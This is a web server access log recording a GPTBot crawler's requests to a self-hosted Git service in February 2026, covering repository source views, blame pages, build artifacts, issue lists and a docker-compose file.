"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11342] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11371] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11372] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11372] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 23829] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 23798] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23815] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:16:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23804] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:16:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 23805] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 23801] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13839] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:16:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" +[17/Feb/2026:16:56:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/organizations?q=&sort=alphabetically" [Client 74.7.227.38] [Length 5085] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/organizations" +[17/Feb/2026:16:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 10945] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" +[17/Feb/2026:16:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:16:56:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:16:56:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:16:56:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:16:56:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:16:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1854] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:16:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1428] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:16:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:16:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:16:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10957] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:16:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:16:56:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=name&state=closed" [Client 74.7.227.38] [Length 8502] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:16:56:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 12624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:16:56:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:16:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 20003] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:16:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" +[17/Feb/2026:16:56:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" +[17/Feb/2026:16:56:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10129] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:16:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10129] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:16:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14713] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=name&state=closed" [Client 74.7.227.38] [Length 8493] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=name&state=open" +[17/Feb/2026:16:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15111] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 